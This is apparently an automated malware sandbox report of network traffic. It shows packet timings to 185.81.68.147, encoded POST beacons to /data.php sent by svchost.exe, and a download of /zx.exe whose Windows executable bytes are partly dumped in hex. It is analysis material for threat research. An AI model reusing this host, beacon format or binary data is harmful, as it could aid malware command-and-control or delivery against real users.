                                                                                      Dec 26, 2024 12:06:29.092758894 CET8049938185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:29.092847109 CET4993880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.271744967 CET4993880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.342869997 CET4994080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.391253948 CET8049938185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:29.412522078 CET4994380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.462425947 CET8049940185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:29.462505102 CET4994080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.462893963 CET4994080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.532238007 CET8049943185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:29.532367945 CET4994380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.533220053 CET4994380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:29.582492113 CET8049940185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:29.652664900 CET8049943185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.036319971 CET8049940185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.036465883 CET8049940185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.036592960 CET4994080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.036660910 CET4994080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.142983913 CET4994780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.156112909 CET8049940185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.237620115 CET8049943185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.237998962 CET8049943185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.238079071 CET4994380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.239890099 CET4994380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.262468100 CET8049947185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.262571096 CET4994780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.262727022 CET4994780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.353210926 CET4994880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.359359026 CET8049943185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.382220984 CET8049947185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.472836018 CET8049948185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:31.475991011 CET4994880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.478944063 CET4994880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:31.598556042 CET8049948185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:32.829889059 CET8049947185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:32.829941034 CET8049947185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:32.830065012 CET4994780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:32.837367058 CET4994780192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:32.940052986 CET4995480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:32.957062960 CET8049947185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:33.059716940 CET8049954185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:33.059847116 CET4995480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:33.060007095 CET4995480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:33.179507971 CET8049954185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:35.267668009 CET4994880192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.267713070 CET4995480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.388343096 CET4995980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.389162064 CET4996080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.507906914 CET8049959185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:35.508069038 CET4995980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.508236885 CET4995980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.508630037 CET8049960185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:35.508703947 CET4996080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.508825064 CET4996080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:35.629040956 CET8049959185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:35.629345894 CET8049960185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:39.399138927 CET4995980192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.399193048 CET4996080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.507910013 CET4997080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.508534908 CET4997180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.627594948 CET8049970185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:39.627712011 CET4997080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.628006935 CET4997080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.628108025 CET8049971185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:39.628209114 CET4997180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.628374100 CET4997180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:39.747502089 CET8049970185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:39.747875929 CET8049971185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:41.326697111 CET8049971185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:41.326759100 CET8049971185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:41.326872110 CET4997180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:41.326916933 CET4997180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:41.447043896 CET4997480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:41.447913885 CET8049971185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:41.566634893 CET8049974185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:41.566726923 CET4997480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:41.567056894 CET4997480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:41.686625004 CET8049974185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:43.540117979 CET4997480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.540163040 CET4997080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.649236917 CET4998080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.650163889 CET4998180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.768883944 CET8049980185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:43.769643068 CET8049981185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:43.769768000 CET4998080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.769773960 CET4998180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.769896030 CET4998080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.769967079 CET4998180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:43.889405012 CET8049980185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:43.889421940 CET8049981185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:47.680538893 CET4998080192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:47.680562973 CET4998180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:47.936423063 CET4999280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:47.937179089 CET4999380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:48.056617975 CET8049992185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:48.056715965 CET4999280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:48.057105064 CET8049993185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:48.057272911 CET4999380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:48.057634115 CET4999280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:48.060142994 CET4999380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:48.179174900 CET8049992185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:48.181561947 CET8049993185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:51.938843966 CET4999380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:51.938950062 CET4999280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.061661959 CET5000280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.062654018 CET5000380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.181149006 CET8050002185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:52.181235075 CET5000280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.182312965 CET8050003185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:52.182370901 CET5000380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.185312986 CET5000280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.185345888 CET5000380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:52.304758072 CET8050002185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:52.304807901 CET8050003185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:56.109724045 CET5000280192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.109736919 CET5000380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.280424118 CET5001480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.295865059 CET5001580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.767210960 CET8050014185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:56.767226934 CET8050015185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:56.767290115 CET5001480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.767328024 CET5001580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.767433882 CET5001480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.767530918 CET5001580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:06:56.887025118 CET8050014185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:06:56.887039900 CET8050015185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:00.281950951 CET5001480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.281986952 CET5001580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.406224966 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.406533957 CET5002480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.543735981 CET8050023185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:00.543750048 CET8050024185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:00.543945074 CET5002480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.543973923 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.544183016 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.544238091 CET5002480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:00.672414064 CET8050023185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:00.672426939 CET8050024185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:03.515336037 CET8050023185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:03.515398979 CET8050023185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:03.515405893 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.515578032 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.532665014 CET5002380192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.652226925 CET8050023185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:03.709682941 CET5003180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.829250097 CET8050031185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:03.830849886 CET5003180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.834853888 CET5003180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:03.954327106 CET8050031185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:04.406881094 CET5002480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.406924963 CET5003180192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.541857958 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.542036057 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.661393881 CET8050034185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:04.661484003 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.661490917 CET8050035185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:04.661551952 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.661807060 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.661883116 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:04.783638954 CET8050034185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:04.785458088 CET8050035185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.195415020 CET8050035185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.195537090 CET8050035185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.195581913 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.195581913 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.195707083 CET5003580192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.315224886 CET8050035185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.328583956 CET8050034185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.328651905 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.328737020 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.328782082 CET8050034185.81.68.147192.168.2.5
                                                                                      Dec 26, 2024 12:07:06.328833103 CET5003480192.168.2.5185.81.68.147
                                                                                      Dec 26, 2024 12:07:06.448255062 CET8050034185.81.68.147192.168.2.5

                                                                                      HTTP Request Dependency Graph

                                                                                      • 185.81.68.147

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549704185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:01.164187908 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:02.711452961 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:02 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549705185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:01.164652109 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:02.934142113 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:02 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.549706185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:03.041512966 CET304OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 49
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69
                                                                                      Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
                                                                                      Dec 26, 2024 12:05:04.592205048 CET274INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:04 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Length: 84
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Data Raw: 36 2b 43 7a 72 36 2b 72 34 66 54 30 36 75 50 75 39 65 50 71 39 65 33 6a 39 65 72 76 37 50 53 68 6f 2f 57 2b 6f 37 37 57 30 65 76 67 73 36 2b 76 71 2b 48 30 39 4f 72 6a 37 76 58 6a 36 76 58 74 34 2f 58 71 37 2b 7a 30 6a 34 2f 31 76 71 4f 2b 31 74 45 3d
                                                                                      Data Ascii: 6+Czr6+r4fT06uPu9ePq9e3j9erv7PSho/W+o77W0evgs6+vq+H09Orj7vXj6vXt4/Xq7+z0j4/1vqO+1tE=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.549707185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:03.276761055 CET389OUTPOST /data.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
                                                                                      Host: 185.81.68.147
                                                                                      Content-Length: 133
                                                                                      Connection: Close
                                                                                      Cache-Control: no-cache
                                                                                      Data Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72
                                                                                      Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
                                                                                      Dec 26, 2024 12:05:04.932406902 CET166INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:04 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.549708185.81.68.147802520C:\Windows\System32\svchost.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 26, 2024 12:05:04.718410969 CET95OUTGET /zx.exe HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0
                                                                                      Host: 185.81.68.147
                                                                                      Cache-Control: no-cache
                                                                                      Dec 26, 2024 12:05:06.143408060 CET1236INHTTP/1.1 200 OK
                                                                                      Date: Thu, 26 Dec 2024 11:05:05 GMT
                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                      Last-Modified: Wed, 25 Dec 2024 01:47:03 GMT
                                                                                      ETag: "5a452f-62a0e67fff3c0"
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 5915951
                                                                                      Content-Type: application/x-msdos-program
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 17 64 6b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 49 2f [TRUNCATED]
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEddkg"(X@I/[`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
                                                                                      Dec 26, 2024 12:05:06.143430948 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 e8 2f e1 00 00 8b 08 48 8b 05 ee cf 03 00 89 08 e8 27 e1 00 00 48 8b 08 48 8b 05 dd cf 03 00 48 89 48 08 48
                                                                                      Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.LHuHVHMVE3HI
                                                                                      Dec 26, 2024 12:05:06.143449068 CET1236INData Raw: 8b cc e8 37 e9 00 00 85 c0 79 1c 4c 8d 46 12 48 8d 15 e4 a7 02 00 48 8d 0d 19 a8 02 00 e8 88 16 00 00 e9 af 00 00 00 8b 4e 0c e8 8b 30 01 00 4c 8b f8 48 85 c0 75 20 44 8b 4e 0c 4c 8d 46 12 48 8d 15 04 a8 02 00 48 8d 0d 11 a6 02 00 e8 58 16 00 00
                                                                                      Data Ascii: 7yLFHHN0LHu DNLFHHX~uME3HIW^Lt$PMHt; DH;HMAHGIH^HrhL H+uH|$`Lt$PtI/LIIMtHI.D
                                                                                      Dec 26, 2024 12:05:06.143461943 CET1236INData Raw: 8b c6 48 83 c4 20 41 5f 41 5e 5e c3 4c 8d 46 12 48 8d 15 57 a2 02 00 48 8d 0d 84 a2 02 00 e8 b3 11 00 00 b8 ff ff ff ff eb aa cc cc cc cc cc cc cc cc cc cc cc cc 40 53 57 48 83 ec 38 80 7a 11 6e 48 8b fa 48 8b d9 75 24 e8 78 fa ff ff 8b d8 85 c0
                                                                                      Data Ascii: H A_A^^LFHWH@SWH8znHHu$xyHWH_H8_[HnLd$`Ie)LHu(LGHRH6Ld$`H8_[H2L|$ H!)LHuHWHTWE3H
                                                                                      Dec 26, 2024 12:05:06.143474102 CET1236INData Raw: 83 1c 10 00 00 e8 88 01 00 00 8b 44 24 28 45 33 c0 48 2b f0 48 8b cf 48 8d 46 58 48 89 83 00 10 00 00 8b 54 24 2c 48 03 d0 e8 68 df 00 00 8b 4c 24 30 e8 db 26 01 00 48 89 83 08 10 00 00 48 85 c0 75 18 48 8d 15 88 9f 02 00 48 8d 0d 65 9c 02 00 e8
                                                                                      Data Ascii: D$(E3H+HHFXHT$,HhL$0&HHuHHeT$0LAHHsH}HJyD$0HHH*tHgHH;DfoRf3A|of8
                                                                                      Dec 26, 2024 12:05:06.143495083 CET1236INData Raw: 48 8b 4f 08 ba 30 00 00 00 41 b9 01 00 00 00 ff 15 f9 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 30 20 00 00 ba 30 00 00 00 ff 15 da 94 02 00 4c 8b 87 48 20 00 00 41 b9 01 00 00 00 48 8b 8f 38 20 00 00 ba 30 00 00 00 ff 15 bb 94 02
                                                                                      Data Ascii: HO0ALH AH0 0LH AH8 0LH AH@ 0H0 LO(E3LO E3H8 jHOHT$`tDD$lHT$hfD+D$df+T$`H$pH3YL$I[I
                                                                                      Dec 26, 2024 12:05:06.143508911 CET1236INData Raw: 4c 24 40 48 8b d8 e8 4b 1d 01 00 48 8b 4c 24 48 e8 41 1d 01 00 48 8b 4c 24 50 e8 37 1d 01 00 48 8b 8d 78 1f 00 00 48 85 c9 74 06 ff 15 09 8c 02 00 48 8b 8d 80 1f 00 00 48 85 c9 74 06 ff 15 97 8f 02 00 8b c3 48 8b 8d c0 20 00 00 48 33 cc e8 16 94
                                                                                      Data Ascii: L$@HKHL$HAHL$P7HxHtHHtH H3H!A^_^[]H\$Hl$Ht$H|$ AVH 3IHDHtE33bHHtE33HaLHtE33HaHHLIHLEHfI
                                                                                      Dec 26, 2024 12:05:06.143764019 CET1236INData Raw: 94 24 30 04 00 00 48 8d 4c 24 30 e8 c6 5d 00 00 33 c9 41 b9 30 00 00 00 48 85 c0 74 17 4c 8d 05 52 93 02 00 48 8d 94 24 30 04 00 00 ff 15 bc 8a 02 00 eb 12 4c 8d 05 0b 93 02 00 48 8d 54 24 30 ff 15 b0 8a 02 00 48 8b 8c 24 30 0c 00 00 48 33 cc e8
                                                                                      Data Ascii: $0HL$0]3A0HtLRH$0LHT$0H$0H3@HH_[LIKISMCMK SWHHHH3H$0HI{H|$(HT$0LHD$ AHHVA0LHT$03H$0H3H
